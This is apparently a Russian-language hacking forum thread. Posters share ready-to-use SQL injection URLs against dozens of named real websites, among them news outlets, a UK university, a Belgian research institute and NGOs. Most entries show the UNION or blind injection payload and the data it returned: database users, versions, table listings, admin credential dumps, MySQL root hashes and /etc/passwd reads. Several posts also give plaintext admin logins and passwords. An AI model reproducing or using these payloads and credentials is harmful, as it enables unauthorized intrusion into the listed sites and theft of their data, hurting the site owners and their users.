SQL Инъекции

http://www.lueffyworld.net/sport.php?id=-121+union+select+1,2,3,4,concat_ws(0x3a,user_id,username,user_password),6,7,8+from+phpbb_users/*

 

http://www.roofing.ru/news/text?newsid=-10+union+select+1,2,3,4,5,6,7
user(),database(),version():
roofing_admin@localhost::roofing_bcms::4.0.27-standard

 

Blind sql-inj
http://www.itp.zp.ua/index.php?showpage=32+and+substring(version(),1,1)=5

 

PageRank = 7

Version: Microsoft SQL Server 2000 - 8.00.679 (Intel X86) Aug 26 2002 15:09:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)

User: dbase_user

Database: fnag

 

<<myOpera>>

Code:

http://forum.myopera.net/showflat.php?Cat=&Board=newsuser&Number=44645+and+ascii(substring(version(),1,1))=53--+

db: 5.0.27
name_db: myopera_myoperarum
user: myopera_myopera@localhost

Это не очем не говарит!!!!!! и не доказывает что не я нашол.....
Там я тока под другм ником более того, этого юзвера я угнал неделю назад......

 

НЕ ТОБОЙ НАЙДЕНО... Мог бы "-" поставил бы...
http://forum.xakep.ru/fb.aspx?m=1483201
Возможно,нашёль и ты сам,но было выложено рание...




http://hip-hop.sib.net/music/download.php?id=100+and+substring(@@version,1,1)=4

 

http://sandpiperleads.com/warrenrupp_register/thanks.php?RegisterID=-9999+UNION+SELECT+user(),2,version()/*

 

<<Управления большими системами>>

Code:

http://ubs.mtas.ru/search/search_results.php?short_view=0&publication_id=-2621+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--+

db: 5.0.44-log
name_db: mtas116_libr
user: mtas116_libr@localhost

 

И снова blind sql-inj
http://associate.hud.ac.uk/php/showpage.php?pageid=54+and+substring(version(),1,1)=5

 

<<Центр востоноаления зрения>>

Code:

http://www.cvz.ru/index.php?id=-10+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8--+

db: 4.1.22-log
name_db: wwwcvzru_cmsmy
user: cvz_cmsmy@localhost

<<ТЕАТР.DOC>>

Code:

http://www.teatrdoc.ru/plays.php?id=-5+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5--+

db: 4.1.22
name_db: kinoteatr_td
user: [email protected]

<<Экозащита>>

Code:

http://ecodefense.ru/view.php?id=-431+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),database(),user()),11--+

db: 4.1.22
name_db: ecodefense
user: ecodefensedb@localhost

 

«Информационные технологии и телерадиокоммуникации» - электронный журнал - http://ittc.ksu.ru

Code:

http://ittc.ksu.ru/?id=-29+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11--

user(): ittcdb@localhost
database(): ittcdb
version(): 5.0.67

PR=4

читаем таблицы

Code:

http://ittc.ksu.ru/?id=-29+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+INFORMATION_schema.tables+limit+0,1--

Holistic Health Yellow Pages and Supersite

Code:

http://www.findhealer.com/ref/docdetail.php3?id=-29+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8--

user(): chinamed@localhost
database(): chinamed
version(): 4.1.21-standard

PR=4

 

http://www.bulgariahousehunting.com/details.php?id=116+AND+SUBSTRING((y=1..3()),1,1)=x--


y1=version
y2=database
y3=user

x=Version : 4.1.22-log
Database : bulgar_house
User : krasig@localhost

 

www.baspublishing.com.au

Code:

http://www.baspublishing.com.au/detail.php?id=-1+union+all+select+0,1,concat_ws(0x3a,user,password,file_priv),3,4,5+from+mysql.user--

Логин/пасс:

Code:

root:164378093c1aa083

file_priv - Y

Читает etc/passwd:

Code:

http://www.baspublishing.com.au/detail.php?id=-1+union+all+select+0,1,load_file(0x2f6574632f706173737764),3,4,5+from+mysql.user--

Code:

# $FreeBSD: src/etc/master.passwd,v 1.25.2.1 2001/11/24 17:22:24 gshapiro Exp $ # root:*:0:0:Charlie &:/root:/bin/bash toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system proces

На сервере крутится FreeBSD.

------------------------------------------------------------------
The End!

 

http://travel.chinavista.com

Code:

http://travel.chinavista.com/culture2.php?id=1+union+select+1,table_name+from+information_schema.tables/*

 

http://www.transtriumf.com/line.php?id=-8+UNION+SELECT+1,2,3,4,5,6,7,8/*

Database Version: 4.0.16-Max-log
Database name: transtriumf
User name: transtriumf@localhost

 

<<NovoNews>>

Code:

http://www.novonews.lv/index.php?mode=news&id=-70666'+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12,13,14,15--+

db: 5.0.22-log
name_db: novonews_v2
user: [email protected]

log: dima
pass: amid643
email: [email protected]
http://www.novonews.lv/admin/index.php?login

<<Стоматит>>

Code:

http://www.dentoprofile.ru/php/content.php?id=577+and+ascii(substring(version(),1,1))=52--+

database: 4.0.16

<<SFCB>>

Code:

http://www.sfcb.org/php/category.php?id=1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12/*

db: 4.1.22
name_db: sfcb
user: sfcbor@localhost


<<AveDesk>>

Code:

http://www.avedesk.org/desklet.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10--

db: 5.0.67
name_db: dfilezon_avedesk
user: dfilezon_ave@localhost

log: addd
pass: fff

 

Code:

http://www.ausit.org/eng/showpage.php3?id=-650+union+select+concat_ws(0x20,version(),database(),user()),2,3

Database Version: 4.1.25-log
Database name: ausit2
User name: dream@localhost

 

Code:

http://www.conferencedes19cpas.irisnet.be/cpas2.php?id=4+union+select+1,unhex(hex(concat(version(),0x3a,database(),0x3a,user()))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+limit+1,1/*

version():4.1.11-Debian_4sarge8-log
database():db_cpasbru
user():[email protected]
__

Code:

http://w3.iihe.ac.be/About_Us/ident_people_iihe.php?ID=8+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+mysql.user+limit+1,1/*

version():5.0.27
database():IIHE
user():root@localhost

Code:

http://w3.iihe.ac.be/About_Us/ident_people_iihe.php?ID=8+union+select+1,2,concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+mysql.user+limit+1,1/*

root:710789ba2a55b808

Code:

http://w3.iihe.ac.be/About_Us/ident_people_iihe.php?ID=8+union+select+1,2,load_file(%27/etc/passwd%27),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+mysql.user+limit+1,1/*

 

<<MAXIM>>

Code:

http://www.maxim-stroy.ru/catalog/index.php?id=-80+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,version(),database(),user()),9,10,11,12,13--+

db: 5.0.67-log
name_db: u72532
user: [email protected]

log: admin
pass: max77

 

www.auroragroup.com.au

Колонки из Information_schema:

Code:

articles,galleries,photos,phplist_admin,phplist_admin_attribute,phplist_admin_task,phplist_adminattribute,phplist_attachment,phplist_bounce,phplist_bounceregex,phplist_bounceregex_bounce,phplist_config,phplist_eventlog,phplist_linktrack,phplist_linktrack_userclick,phplist_list,phplist_listmessage,phplist_listrss,phplist_listuser,phplist_message,phplist_message_attachment,phplist_messagedata,phplist_rssitem,phplist_rssitem_data,phplist_rssitem_user,phplist_sendprocess,phplist_subscribepage,phplist_subscribepage_data,phplist_task,phplist_template,phplist_templateimage,phplist_urlcache,phplist_user_attribute,phplist_user_blacklist,phplist_user_blacklist_data,phplist_user_message_bounce,phplist_user_message_forward,phplist_user_rss,phplist_user_user,phplist_user_user_attribute,php  Return to gallery

Меня заимнересовала колонка phplist_admin
Её структура:

Code:

id,loginname,namelc,email,created,modified,modifiedby,password,passwordchanged,superuser,disabled

Вывод:

Code:

http://www.auroragroup.com.au/viewphoto.php?id=-1+union+all+select+0,1,2,concat_ws(0x3a,id,loginname,namelc,email,created,modified,modifiedby,password,passwordchanged,superuser,disabled)+from+phplist_admin--

------------------------------------------------------------------------------------------------------
The End!